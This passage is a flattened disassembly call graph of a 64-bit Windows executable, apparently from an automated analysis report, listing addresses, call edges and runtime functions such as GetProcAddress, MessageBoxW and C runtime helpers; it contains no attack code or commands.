15184->14936 15186 7ff7a6733cbc 15185->15186 15187 7ff7a6737a30 57 API calls 15186->15187 15188 7ff7a6733ce7 15187->15188 15189 7ff7a6737a30 57 API calls 15188->15189 15190 7ff7a6733cfa 15189->15190 16915 7ff7a67454c8 15190->16915 15193 7ff7a673ad80 _wfindfirst32i64 8 API calls 15194 7ff7a67337da 15193->15194 15194->14939 15195 7ff7a6737200 15194->15195 15196 7ff7a6737224 15195->15196 15197 7ff7a673f934 73 API calls 15196->15197 15199 7ff7a67372fb __vcrt_freefls 15196->15199 15198 7ff7a673723e 15197->15198 15198->15199 17294 7ff7a6747938 15198->17294 15199->14943 15201 7ff7a673f934 73 API calls 15203 7ff7a6737253 15201->15203 15202 7ff7a673f5fc _fread_nolock 53 API calls 15202->15203 15203->15199 15203->15201 15203->15202 15205 7ff7a673f2dc 15204->15205 17309 7ff7a673f088 15205->17309 15207 7ff7a673f2f5 15207->14939 15209 7ff7a6733297 15208->15209 15210 7ff7a67332c0 15208->15210 15209->15210 15211 7ff7a6731780 59 API calls 15209->15211 15210->14921 15211->15209 15213 7ff7a6735b04 15212->15213 15218 7ff7a6735b31 15212->15218 15214 7ff7a6735b2c 15213->15214 15215 7ff7a6735b27 memcpy_s __vcrt_freefls 15213->15215 15216 7ff7a6731780 59 API calls 15213->15216 15213->15218 17320 7ff7a67312b0 15214->17320 15215->14945 15216->15213 15218->15215 17346 7ff7a6733d30 15218->17346 15220 7ff7a6735b97 15220->15215 15221 7ff7a6732770 59 API calls 15220->15221 15221->15215 15223 7ff7a673565a memcpy_s 15222->15223 15224 7ff7a673577f 15223->15224 15227 7ff7a673579b 15223->15227 15230 7ff7a6733d30 49 API calls 15223->15230 15231 7ff7a6735760 15223->15231 15239 7ff7a6731440 161 API calls 15223->15239 15240 7ff7a6735781 15223->15240 17349 7ff7a6731650 15223->17349 15226 7ff7a6733d30 49 API calls 15224->15226 15228 7ff7a67357f8 15226->15228 15229 7ff7a6732770 59 API calls 15227->15229 15232 7ff7a6733d30 49 API calls 15228->15232 15235 7ff7a6735791 __vcrt_freefls 15229->15235 15230->15223 15231->15224 15233 7ff7a6733d30 49 API calls 15231->15233 15234 7ff7a6735828 15232->15234 15233->15224 15238 7ff7a6733d30 49 API calls 15234->15238 15236 7ff7a673ad80 _wfindfirst32i64 8 API calls 15235->15236 15237 7ff7a67338d9 15236->15237 15237->14953 15237->14954 15238->15235 15239->15223 15241 7ff7a6732770 59 API calls 15240->15241 15241->15235 17354 7ff7a67371b0 15242->17354 15244 7ff7a67355e2 15245 7ff7a67371b0 58 API calls 15244->15245 15246 7ff7a67355f5 15245->15246 15247 7ff7a673561a 15246->15247 15248 7ff7a673560d GetProcAddress 15246->15248 15249 7ff7a6732770 59 API calls 15247->15249 15252 7ff7a6735f79 15248->15252 15253 7ff7a6735f9c GetProcAddress 15248->15253 15251 7ff7a6735626 15249->15251 15251->14961 15255 7ff7a6732620 57 API calls 15252->15255 15253->15252 15254 7ff7a6735fc1 GetProcAddress 15253->15254 15254->15252 15256 7ff7a6735fe6 GetProcAddress 15254->15256 15257 7ff7a6735f8c 15255->15257 15256->15252 15258 7ff7a673600e GetProcAddress 15256->15258 15257->14961 15258->15252 15259 7ff7a6736036 GetProcAddress 15258->15259 15259->15252 15260 7ff7a673605e GetProcAddress 15259->15260 15261 7ff7a673607a 15260->15261 15262 7ff7a6736086 GetProcAddress 15260->15262 15261->15262 15263 7ff7a67360ae GetProcAddress 15262->15263 15264 7ff7a67360a2 15262->15264 15265 7ff7a67360ca 15263->15265 15266 7ff7a67360d6 GetProcAddress 15263->15266 15264->15263 15265->15266 15267 7ff7a67360fe GetProcAddress 15266->15267 15268 7ff7a67360f2 15266->15268 15269 7ff7a673611a 15267->15269 15270 7ff7a6736126 GetProcAddress 15267->15270 15268->15267 15269->15270 15311 7ff7a6735cb4 15310->15311 15312 7ff7a6732770 59 API calls 15311->15312 15315 7ff7a67338fa 15311->15315 15313 7ff7a6735d0e 15312->15313 15314 7ff7a6735890 FreeLibrary 15313->15314 15314->15315 15315->14940 15317 7ff7a6731b55 15316->15317 15318 7ff7a6743be4 49 API calls 15317->15318 15319 7ff7a6731b78 15318->15319 15319->14960 17358 7ff7a6734960 15320->17358 15323 7ff7a67330fd 15323->14968 15325 7ff7a67330d4 15325->15323 17414 7ff7a67346e0 15325->17414 15327 7ff7a67330e0 15327->15323 17424 7ff7a6734840 15327->17424 15329 7ff7a67330ec 15329->15323 15330 7ff7a6733327 15329->15330 15331 7ff7a673333c 15329->15331 15376 7ff7a673adb0 15357->15376 15359 7ff7a673263c GetLastError 15360 7ff7a6732669 15359->15360 15378 7ff7a6743be4 15360->15378 15365 7ff7a6731b30 49 API calls 15366 7ff7a67326c8 __scrt_get_show_window_mode 15365->15366 15367 7ff7a6737a30 54 API calls 15366->15367 15368 7ff7a67326f5 15367->15368 15369 7ff7a67326fa 15368->15369 15370 7ff7a6732734 MessageBoxA 15368->15370 15371 7ff7a6737a30 54 API calls 15369->15371 15372 7ff7a673274e 15370->15372 15373 7ff7a6732714 MessageBoxW 15371->15373 15374 7ff7a673ad80 _wfindfirst32i64 8 API calls 15372->15374 15373->15372 15375 7ff7a673275e 15374->15375 15375->15033 15377 7ff7a673adda 15376->15377 15377->15359 15377->15377 15379 7ff7a6743c3e 15378->15379 15380 7ff7a6743c63 15379->15380 15382 7ff7a6743c9f 15379->15382 15381 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15380->15381 15384 7ff7a6743c8d 15381->15384 15408 7ff7a6741e70 15382->15408 15385 7ff7a673ad80 _wfindfirst32i64 8 API calls 15384->15385 15387 7ff7a6732699 15385->15387 15386 7ff7a6749e18 __free_lconv_mon 11 API calls 15386->15384 15396 7ff7a67374b0 15387->15396 15389 7ff7a6743da0 15391 7ff7a6743d7c 15389->15391 15392 7ff7a6743daa 15389->15392 15390 7ff7a6743d48 15390->15391 15395 7ff7a6743d51 15390->15395 15391->15386 15394 7ff7a6749e18 __free_lconv_mon 11 API calls 15392->15394 15393 7ff7a6749e18 __free_lconv_mon 11 API calls 15393->15384 15394->15384 15395->15393 15397 7ff7a67374bc 15396->15397 15398 7ff7a67374d7 GetLastError 15397->15398 15399 7ff7a67374dd FormatMessageW 15397->15399 15398->15399 15400 7ff7a673752c WideCharToMultiByte 15399->15400 15401 7ff7a6737510 15399->15401 15403 7ff7a6737523 15400->15403 15404 7ff7a6737566 15400->15404 15402 7ff7a6732620 54 API calls 15401->15402 15402->15403 15406 7ff7a673ad80 _wfindfirst32i64 8 API calls 15403->15406 15405 7ff7a6732620 54 API calls 15404->15405 15405->15403 15407 7ff7a67326a0 15406->15407 15407->15365 15409 7ff7a6741eae 15408->15409 15410 7ff7a6741e9e 15408->15410 15411 7ff7a6741eb7 15409->15411 15412 7ff7a6741ee5 15409->15412 15415 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15410->15415 15413 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15411->15413 15412->15410 15414 7ff7a6741edd 15412->15414 15418 7ff7a6742194 15412->15418 15422 7ff7a6742800 15412->15422 15448 7ff7a67424c8 15412->15448 15478 7ff7a6741d50 15412->15478 15481 7ff7a6743a20 15412->15481 15413->15414 15414->15389 15414->15390 15414->15391 15414->15395 15415->15414 15420 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15418->15420 15420->15410 15423 7ff7a6742842 15422->15423 15424 7ff7a67428b5 15422->15424 15425 7ff7a6742848 15423->15425 15426 7ff7a67428df 15423->15426 15427 7ff7a67428ba 15424->15427 15428 7ff7a674290f 15424->15428 15434 7ff7a674284d 15425->15434 15437 7ff7a674291e 15425->15437 15505 7ff7a6740db0 15426->15505 15429 7ff7a67428bc 15427->15429 15430 7ff7a67428ef 15427->15430 15428->15426 15428->15437 15446 7ff7a6742878 15428->15446 15432 7ff7a674285d 15429->15432 15436 7ff7a67428cb 15429->15436 15512 7ff7a67409a0 15430->15512 15447 7ff7a674294d 15432->15447 15487 7ff7a6743164 15432->15487 15434->15432 15438 7ff7a6742890 15434->15438 15434->15446 15436->15426 15440 7ff7a67428d0 15436->15440 15437->15447 15519 7ff7a67411c0 15437->15519 15438->15447 15497 7ff7a6743620 15438->15497 15440->15447 15501 7ff7a67437b8 15440->15501 15442 7ff7a673ad80 _wfindfirst32i64 8 API calls 15444 7ff7a6742be3 15442->15444 15444->15412 15446->15447 15526 7ff7a674da00 15446->15526 15447->15442 15449 7ff7a67424e9 15448->15449 15450 7ff7a67424d3 15448->15450 15451 7ff7a6742527 15449->15451 15454 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15449->15454 15450->15451 15452 7ff7a6742842 15450->15452 15453 7ff7a67428b5 15450->15453 15451->15412 15455 7ff7a6742848 15452->15455 15456 7ff7a67428df 15452->15456 15457 7ff7a67428ba 15453->15457 15458 7ff7a674290f 15453->15458 15454->15451 15460 7ff7a674284d 15455->15460 15465 7ff7a674291e 15455->15465 15459 7ff7a6740db0 38 API calls 15456->15459 15461 7ff7a67428ef 15457->15461 15462 7ff7a67428bc 15457->15462 15458->15456 15458->15465 15476 7ff7a6742878 15458->15476 15459->15476 15463 7ff7a674285d 15460->15463 15467 7ff7a6742890 15460->15467 15460->15476 15466 7ff7a67409a0 38 API calls 15461->15466 15462->15463 15469 7ff7a67428cb 15462->15469 15464 7ff7a6743164 47 API calls 15463->15464 15477 7ff7a674294d 15463->15477 15464->15476 15468 7ff7a67411c0 38 API calls 15465->15468 15465->15477 15466->15476 15470 7ff7a6743620 47 API calls 15467->15470 15467->15477 15468->15476 15469->15456 15471 7ff7a67428d0 15469->15471 15470->15476 15473 7ff7a67437b8 37 API calls 15471->15473 15471->15477 15472 7ff7a673ad80 _wfindfirst32i64 8 API calls 15474 7ff7a6742be3 15472->15474 15473->15476 15474->15412 15475 7ff7a674da00 47 API calls 15475->15476 15476->15475 15476->15477 15477->15472 15682 7ff7a673ff74 15478->15682 15482 7ff7a6743a37 15481->15482 15699 7ff7a674cb60 15482->15699 15488 7ff7a6743186 15487->15488 15536 7ff7a673fde0 15488->15536 15493 7ff7a6743a20 45 API calls 15494 7ff7a67432c3 15493->15494 15495 7ff7a6743a20 45 API calls 15494->15495 15496 7ff7a674334c 15494->15496 15495->15496 15496->15446 15498 7ff7a67436a0 15497->15498 15499 7ff7a6743638 15497->15499 15498->15446 15499->15498 15500 7ff7a674da00 47 API calls 15499->15500 15500->15498 15503 7ff7a67437d9 15501->15503 15502 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15504 7ff7a674380a 15502->15504 15503->15502 15503->15504 15504->15446 15506 7ff7a6740de3 15505->15506 15507 7ff7a6740e12 15506->15507 15509 7ff7a6740ecf 15506->15509 15508 7ff7a673fde0 12 API calls 15507->15508 15511 7ff7a6740e4f 15507->15511 15508->15511 15510 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15509->15510 15510->15511 15511->15446 15513 7ff7a67409d3 15512->15513 15514 7ff7a6740a02 15513->15514 15516 7ff7a6740abf 15513->15516 15515 7ff7a673fde0 12 API calls 15514->15515 15518 7ff7a6740a3f 15514->15518 15515->15518 15517 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15516->15517 15517->15518 15518->15446 15520 7ff7a67411f3 15519->15520 15521 7ff7a6741222 15520->15521 15523 7ff7a67412df 15520->15523 15522 7ff7a673fde0 12 API calls 15521->15522 15525 7ff7a674125f 15521->15525 15522->15525 15524 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15523->15524 15524->15525 15525->15446 15528 7ff7a674da28 15526->15528 15527 7ff7a674da6d 15530 7ff7a674da2d __scrt_get_show_window_mode 15527->15530 15532 7ff7a674da56 __scrt_get_show_window_mode 15527->15532 15679 7ff7a674f0b8 15527->15679 15528->15527 15529 7ff7a6743a20 45 API calls 15528->15529 15528->15530 15528->15532 15529->15527 15530->15446 15531 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15531->15530 15532->15530 15532->15531 15537 7ff7a673fe17 15536->15537 15538 7ff7a673fe06 15536->15538 15537->15538 15566 7ff7a674cacc 15537->15566 15544 7ff7a674d718 15538->15544 15541 7ff7a673fe58 15543 7ff7a6749e18 __free_lconv_mon 11 API calls 15541->15543 15542 7ff7a6749e18 __free_lconv_mon 11 API calls 15542->15541 15543->15538 15545 7ff7a674d768 15544->15545 15546 7ff7a674d735 15544->15546 15545->15546 15549 7ff7a674d79a 15545->15549 15547 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15546->15547 15548 7ff7a67432a1 15547->15548 15548->15493 15548->15494 15555 7ff7a674d8ad 15549->15555 15561 7ff7a674d7e2 15549->15561 15550 7ff7a674d99f 15606 7ff7a674cc04 15550->15606 15552 7ff7a674d965 15599 7ff7a674cf9c 15552->15599 15554 7ff7a674d934 15592 7ff7a674d27c 15554->15592 15555->15550 15555->15552 15555->15554 15557 7ff7a674d8f7 15555->15557 15558 7ff7a674d8ed 15555->15558 15582 7ff7a674d4ac 15557->15582 15558->15552 15560 7ff7a674d8f2 15558->15560 15560->15554 15560->15557 15561->15548 15573 7ff7a67491ac 15561->15573 15564 7ff7a6749dd0 _wfindfirst32i64 17 API calls 15565 7ff7a674d9fc 15564->15565 15567 7ff7a674cb17 15566->15567 15571 7ff7a674cadb _get_daylight 15566->15571 15568 7ff7a6744444 _get_daylight 11 API calls 15567->15568 15570 7ff7a673fe44 15568->15570 15569 7ff7a674cafe HeapAlloc 15569->15570 15569->15571 15570->15541 15570->15542 15571->15567 15571->15569 15572 7ff7a67526b0 _get_daylight 2 API calls 15571->15572 15572->15571 15574 7ff7a67491b9 15573->15574 15575 7ff7a67491c3 15573->15575 15574->15575 15580 7ff7a67491de 15574->15580 15576 7ff7a6744444 _get_daylight 11 API calls 15575->15576 15577 7ff7a67491ca 15576->15577 15578 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 15577->15578 15579 7ff7a67491d6 15578->15579 15579->15548 15579->15564 15580->15579 15581 7ff7a6744444 _get_daylight 11 API calls 15580->15581 15581->15577 15615 7ff7a67531cc 15582->15615 15586 7ff7a674d554 15587 7ff7a674d5a9 15586->15587 15589 7ff7a674d574 15586->15589 15591 7ff7a674d558 15586->15591 15668 7ff7a674d098 15587->15668 15664 7ff7a674d354 15589->15664 15591->15548 15593 7ff7a67531cc 38 API calls 15592->15593 15594 7ff7a674d2c6 15593->15594 15595 7ff7a6752c14 37 API calls 15594->15595 15596 7ff7a674d316 15595->15596 15597 7ff7a674d31a 15596->15597 15598 7ff7a674d354 45 API calls 15596->15598 15597->15548 15598->15597 15600 7ff7a67531cc 38 API calls 15599->15600 15601 7ff7a674cfe7 15600->15601 15602 7ff7a6752c14 37 API calls 15601->15602 15603 7ff7a674d03f 15602->15603 15604 7ff7a674d043 15603->15604 15605 7ff7a674d098 45 API calls 15603->15605 15604->15548 15605->15604 15607 7ff7a674cc7c 15606->15607 15608 7ff7a674cc49 15606->15608 15610 7ff7a674cc94 15607->15610 15612 7ff7a674cd15 15607->15612 15609 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15608->15609 15614 7ff7a674cc75 __scrt_get_show_window_mode 15609->15614 15611 7ff7a674cf9c 46 API calls 15610->15611 15611->15614 15613 7ff7a6743a20 45 API calls 15612->15613 15612->15614 15613->15614 15614->15548 15616 7ff7a675321f fegetenv 15615->15616 15617 7ff7a675712c 37 API calls 15616->15617 15620 7ff7a6753272 15617->15620 15618 7ff7a675329f 15623 7ff7a67491ac __std_exception_copy 37 API calls 15618->15623 15619 7ff7a6753362 15621 7ff7a675712c 37 API calls 15619->15621 15620->15619 15625 7ff7a675333c 15620->15625 15626 7ff7a675328d 15620->15626 15622 7ff7a675338c 15621->15622 15627 7ff7a675712c 37 API calls 15622->15627 15624 7ff7a675331d 15623->15624 15628 7ff7a6754444 15624->15628 15634 7ff7a6753325 15624->15634 15629 7ff7a67491ac __std_exception_copy 37 API calls 15625->15629 15626->15618 15626->15619 15630 7ff7a675339d 15627->15630 15631 7ff7a6749dd0 _wfindfirst32i64 17 API calls 15628->15631 15629->15624 15632 7ff7a6757320 20 API calls 15630->15632 15633 7ff7a6754459 15631->15633 15642 7ff7a6753406 __scrt_get_show_window_mode 15632->15642 15635 7ff7a673ad80 _wfindfirst32i64 8 API calls 15634->15635 15636 7ff7a674d4f9 15635->15636 15660 7ff7a6752c14 15636->15660 15637 7ff7a67537af __scrt_get_show_window_mode 15638 7ff7a6753447 memcpy_s 15655 7ff7a6753d8b memcpy_s __scrt_get_show_window_mode 15638->15655 15656 7ff7a67538a3 memcpy_s __scrt_get_show_window_mode 15638->15656 15639 7ff7a6753aef 15640 7ff7a6752d30 37 API calls 15639->15640 15646 7ff7a6754207 15640->15646 15641 7ff7a6753a9b 15641->15639 15643 7ff7a675445c memcpy_s 37 API calls 15641->15643 15642->15637 15642->15638 15644 7ff7a6744444 _get_daylight 11 API calls 15642->15644 15643->15639 15645 7ff7a6753880 15644->15645 15647 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 15645->15647 15649 7ff7a675445c memcpy_s 37 API calls 15646->15649 15657 7ff7a6754262 15646->15657 15647->15638 15648 7ff7a67543e8 15650 7ff7a675712c 37 API calls 15648->15650 15649->15657 15650->15634 15651 7ff7a6744444 11 API calls _get_daylight 15651->15655 15652 7ff7a6744444 11 API calls _get_daylight 15652->15656 15653 7ff7a6752d30 37 API calls 15653->15657 15654 7ff7a6749db0 37 API calls _invalid_parameter_noinfo 15654->15656 15655->15639 15655->15641 15655->15651 15658 7ff7a6749db0 37 API calls _invalid_parameter_noinfo 15655->15658 15656->15641 15656->15652 15656->15654 15657->15648 15657->15653 15659 7ff7a675445c memcpy_s 37 API calls 15657->15659 15658->15655 15659->15657 15661 7ff7a6752c33 15660->15661 15662 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15661->15662 15663 7ff7a6752c5e memcpy_s 15661->15663 15662->15663 15663->15586 15665 7ff7a674d380 memcpy_s 15664->15665 15666 7ff7a6743a20 45 API calls 15665->15666 15667 7ff7a674d43a memcpy_s __scrt_get_show_window_mode 15665->15667 15666->15667 15667->15591 15669 7ff7a674d0d3 15668->15669 15672 7ff7a674d120 memcpy_s 15668->15672 15670 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15669->15670 15671 7ff7a674d0ff 15670->15671 15671->15591 15673 7ff7a674d18b 15672->15673 15675 7ff7a6743a20 45 API calls 15672->15675 15674 7ff7a67491ac __std_exception_copy 37 API calls 15673->15674 15678 7ff7a674d1cd memcpy_s 15674->15678 15675->15673 15676 7ff7a6749dd0 _wfindfirst32i64 17 API calls 15677 7ff7a674d278 15676->15677 15678->15676 15681 7ff7a674f0dc WideCharToMultiByte 15679->15681 15683 7ff7a673ffa1 15682->15683 15684 7ff7a673ffb3 15682->15684 15685 7ff7a6744444 _get_daylight 11 API calls 15683->15685 15687 7ff7a673ffc0 15684->15687 15690 7ff7a673fffd 15684->15690 15686 7ff7a673ffa6 15685->15686 15688 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 15686->15688 15689 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15687->15689 15695 7ff7a673ffb1 15688->15695 15689->15695 15691 7ff7a67400a6 15690->15691 15693 7ff7a6744444 _get_daylight 11 API calls 15690->15693 15692 7ff7a6744444 _get_daylight 11 API calls 15691->15692 15691->15695 15694 7ff7a6740150 15692->15694 15696 7ff7a674009b 15693->15696 15698 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 15694->15698 15695->15412 15697 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 15696->15697 15697->15691 15698->15695 15700 7ff7a674cb79 15699->15700 15701 7ff7a6743a5f 15699->15701 15700->15701 15707 7ff7a6752424 15700->15707 15703 7ff7a674cbcc 15701->15703 15704 7ff7a6743a6f 15703->15704 15705 7ff7a674cbe5 15703->15705 15704->15412 15705->15704 15751 7ff7a6751790 15705->15751 15719 7ff7a674a620 GetLastError 15707->15719 15710 7ff7a675247e 15710->15701 15720 7ff7a674a644 FlsGetValue 15719->15720 15721 7ff7a674a661 FlsSetValue 15719->15721 15722 7ff7a674a65b 15720->15722 15738 7ff7a674a651 15720->15738 15723 7ff7a674a673 15721->15723 15721->15738 15722->15721 15725 7ff7a674dd40 _get_daylight 11 API calls 15723->15725 15724 7ff7a674a6cd SetLastError 15726 7ff7a674a6ed 15724->15726 15727 7ff7a674a6da 15724->15727 15728 7ff7a674a682 15725->15728 15742 7ff7a674920c 15726->15742 15727->15710 15741 7ff7a674f788 EnterCriticalSection 15727->15741 15730 7ff7a674a6a0 FlsSetValue 15728->15730 15731 7ff7a674a690 FlsSetValue 15728->15731 15732 7ff7a674a6ac FlsSetValue 15730->15732 15733 7ff7a674a6be 15730->15733 15735 7ff7a674a699 15731->15735 15732->15735 15737 7ff7a674a3c4 _get_daylight 11 API calls 15733->15737 15736 7ff7a6749e18 __free_lconv_mon 11 API calls 15735->15736 15736->15738 15739 7ff7a674a6c6 15737->15739 15738->15724 15740 7ff7a6749e18 __free_lconv_mon 11 API calls 15739->15740 15740->15724 15743 7ff7a6752770 __FrameHandler3::FrameUnwindToEmptyState EnterCriticalSection LeaveCriticalSection 15742->15743 15744 7ff7a6749215 15743->15744 15745 7ff7a6749224 15744->15745 15746 7ff7a67527c0 __FrameHandler3::FrameUnwindToEmptyState 44 API calls 15744->15746 15747 7ff7a674922d IsProcessorFeaturePresent 15745->15747 15748 7ff7a6749257 __FrameHandler3::FrameUnwindToEmptyState 15745->15748 15746->15745 15749 7ff7a674923c 15747->15749 15750 7ff7a6749ae4 _wfindfirst32i64 14 API calls 15749->15750 15750->15748 15752 7ff7a674a620 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 15751->15752 15753 7ff7a6751799 15752->15753 15761 7ff7a67442ec EnterCriticalSection 15754->15761 15763 7ff7a67324ec 15762->15763 15764 7ff7a6743be4 49 API calls 15763->15764 15765 7ff7a673253f 15764->15765 15766 7ff7a6744444 _get_daylight 11 API calls 15765->15766 15767 7ff7a6732544 15766->15767 15781 7ff7a6744464 15767->15781 15770 7ff7a6731b30 49 API calls 15771 7ff7a6732573 __scrt_get_show_window_mode 15770->15771 15772 7ff7a6737a30 57 API calls 15771->15772 15773 7ff7a67325a0 15772->15773 15774 7ff7a67325df MessageBoxA 15773->15774 15775 7ff7a67325a5 15773->15775 15777 7ff7a67325f9 15774->15777 15776 7ff7a6737a30 57 API calls 15775->15776 15778 7ff7a67325bf MessageBoxW 15776->15778 15779 7ff7a673ad80 _wfindfirst32i64 8 API calls 15777->15779 15778->15777 15780 7ff7a6732609 15779->15780 15780->15043 15782 7ff7a674a798 _get_daylight 11 API calls 15781->15782 15783 7ff7a674447b 15782->15783 15784 7ff7a673254b 15783->15784 15785 7ff7a674dd40 _get_daylight 11 API calls 15783->15785 15788 7ff7a67444bb 15783->15788 15784->15770 15786 7ff7a67444b0 15785->15786 15787 7ff7a6749e18 __free_lconv_mon 11 API calls 15786->15787 15787->15788 15788->15784 15793 7ff7a674e418 15788->15793 15791 7ff7a6749dd0 _wfindfirst32i64 17 API calls 15792 7ff7a6744500 15791->15792 15796 7ff7a674e435 15793->15796 15794 7ff7a674e43a 15795 7ff7a6744444 _get_daylight 11 API calls 15794->15795 15799 7ff7a67444e1 15794->15799 15801 7ff7a674e444 15795->15801 15796->15794 15798 7ff7a674e484 15796->15798 15796->15799 15797 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 15797->15799 15798->15799 15800 7ff7a6744444 _get_daylight 11 API calls 15798->15800 15799->15784 15799->15791 15800->15801 15801->15797 15803 7ff7a6737bd2 WideCharToMultiByte 15802->15803 15804 7ff7a6737b64 WideCharToMultiByte 15802->15804 15805 7ff7a6737bff 15803->15805 15806 7ff7a6733c05 15803->15806 15807 7ff7a6737b8e 15804->15807 15808 7ff7a6737ba5 15804->15808 15809 7ff7a6732620 57 API calls 15805->15809 15806->15052 15806->15054 15810 7ff7a6732620 57 API calls 15807->15810 15808->15803 15811 7ff7a6737bbb 15808->15811 15809->15806 15810->15806 15812 7ff7a6732620 57 API calls 15811->15812 15812->15806 15814 7ff7a6736a0e 15813->15814 15815 7ff7a6749123 15813->15815 15814->15073 15815->15814 15816 7ff7a67491ac __std_exception_copy 37 API calls 15815->15816 15817 7ff7a6749150 15816->15817 15817->15814 15818 7ff7a6749dd0 _wfindfirst32i64 17 API calls 15817->15818 15819 7ff7a6749180 15818->15819 15821 7ff7a67317e4 15820->15821 15822 7ff7a67317d4 15820->15822 15824 7ff7a6737200 83 API calls 15821->15824 15853 7ff7a6731842 15821->15853 15823 7ff7a6733cb0 116 API calls 15822->15823 15823->15821 15825 7ff7a6731815 15824->15825 15825->15853 15854 7ff7a673f934 15825->15854 15827 7ff7a673182b 15829 7ff7a673184c 15827->15829 15830 7ff7a673182f 15827->15830 15828 7ff7a673ad80 _wfindfirst32i64 8 API calls 15831 7ff7a67319c0 15828->15831 15858 7ff7a673f5fc 15829->15858 15832 7ff7a67324d0 59 API calls 15830->15832 15831->15088 15831->15089 15832->15853 15835 7ff7a673f934 73 API calls 15837 7ff7a67318d1 15835->15837 15836 7ff7a67324d0 59 API calls 15836->15853 15838 7ff7a67318fe 15837->15838 15839 7ff7a67318e3 15837->15839 15841 7ff7a673f5fc _fread_nolock 53 API calls 15838->15841 15840 7ff7a67324d0 59 API calls 15839->15840 15840->15853 15842 7ff7a6731913 15841->15842 15843 7ff7a6731867 15842->15843 15844 7ff7a6731925 15842->15844 15843->15836 15861 7ff7a673f370 15844->15861 15847 7ff7a673193d 15848 7ff7a6732770 59 API calls 15847->15848 15848->15853 15849 7ff7a6731993 15851 7ff7a673f2ac 74 API calls 15849->15851 15849->15853 15850 7ff7a6731950 15850->15849 15852 7ff7a6732770 59 API calls 15850->15852 15851->15853 15852->15849 15853->15828 15855 7ff7a673f964 15854->15855 15867 7ff7a673f6c4 15855->15867 15857 7ff7a673f97d 15857->15827 15879 7ff7a673f61c 15858->15879 15862 7ff7a673f379 15861->15862 15863 7ff7a6731939 15861->15863 15864 7ff7a6744444 _get_daylight 11 API calls 15862->15864 15863->15847 15863->15850 15865 7ff7a673f37e 15864->15865 15866 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 15865->15866 15866->15863 15868 7ff7a673f72e 15867->15868 15869 7ff7a673f6ee 15867->15869 15868->15869 15871 7ff7a673f73a 15868->15871 15870 7ff7a6749ce4 _invalid_parameter_noinfo 37 API calls 15869->15870 15872 7ff7a673f715 15870->15872 15878 7ff7a67442ec EnterCriticalSection 15871->15878 15872->15857 15880 7ff7a673f646 15879->15880 15891 7ff7a6731861 15879->15891 15881 7ff7a673f692 15880->15881 15883 7ff7a673f655 __scrt_get_show_window_mode 15880->15883 15880->15891 15892 7ff7a67442ec EnterCriticalSection 15881->15892 15885 7ff7a6744444 _get_daylight 11 API calls 15883->15885 15887 7ff7a673f66a 15885->15887 15889 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 15887->15889 15889->15891 15891->15835 15891->15843 15986 7ff7a6736720 15893->15986 15895 7ff7a6731459 15895->15114 15896 7ff7a6731454 15896->15895 15995 7ff7a6736a40 15896->15995 15899 7ff7a67314a7 15902 7ff7a67314e0 15899->15902 15905 7ff7a6733cb0 116 API calls 15899->15905 15900 7ff7a6731487 15901 7ff7a67324d0 59 API calls 15900->15901 15904 7ff7a673149d 15901->15904 15903 7ff7a673f934 73 API calls 15902->15903 15906 7ff7a67314f2 15903->15906 15904->15114 15907 7ff7a67314bf 15905->15907 15908 7ff7a6731516 15906->15908 15909 7ff7a67314f6 15906->15909 15907->15902 15910 7ff7a67314c7 15907->15910 15912 7ff7a673151c 15908->15912 15913 7ff7a6731534 15908->15913 15911 7ff7a67324d0 59 API calls 15909->15911 15914 7ff7a6732770 59 API calls 15910->15914 15921 7ff7a67314d6 __vcrt_freefls 15911->15921 16020 7ff7a6731050 15912->16020 15917 7ff7a6731556 15913->15917 15925 7ff7a6731575 15913->15925 15914->15921 15916 7ff7a6731624 15919 7ff7a673f2ac 74 API calls 15916->15919 15920 7ff7a67324d0 59 API calls 15917->15920 15918 7ff7a673f2ac 74 API calls 15918->15916 15919->15904 15920->15921 15921->15916 15921->15918 15922 7ff7a673f5fc _fread_nolock 53 API calls 15922->15925 15923 7ff7a67315d5 15926 7ff7a67324d0 59 API calls 15923->15926 15925->15921 15925->15922 15925->15923 16038 7ff7a673fd3c 15925->16038 15926->15921 15928 7ff7a67329a6 15927->15928 15929 7ff7a6731b30 49 API calls 15928->15929 15931 7ff7a67329db 15929->15931 15930 7ff7a6732de1 15931->15930 15932 7ff7a6733b20 49 API calls 15931->15932 15933 7ff7a6732a4f 15932->15933 16617 7ff7a6732e00 15933->16617 15936 7ff7a6732aca 15938 7ff7a6732e00 75 API calls 15936->15938 15937 7ff7a6732a91 15939 7ff7a6736720 98 API calls 15937->15939 15940 7ff7a6732b1c 15938->15940 15941 7ff7a6732a99 15939->15941 15942 7ff7a6732b20 15940->15942 15943 7ff7a6732b86 15940->15943 15944 7ff7a6732aba 15941->15944 16625 7ff7a6736600 15941->16625 15946 7ff7a6736720 98 API calls 15942->15946 15945 7ff7a6732e00 75 API calls 15943->15945 15947 7ff7a6732770 59 API calls 15944->15947 15951 7ff7a6732ac3 15944->15951 15949 7ff7a6732bb2 15945->15949 15950 7ff7a6732b28 15946->15950 15947->15951 15952 7ff7a6732e00 75 API calls 15949->15952 15962 7ff7a6732c12 15949->15962 15950->15944 15953 7ff7a6736600 138 API calls 15950->15953 15955 7ff7a673ad80 _wfindfirst32i64 8 API calls 15951->15955 15956 7ff7a6732be2 15952->15956 15957 7ff7a6732b45 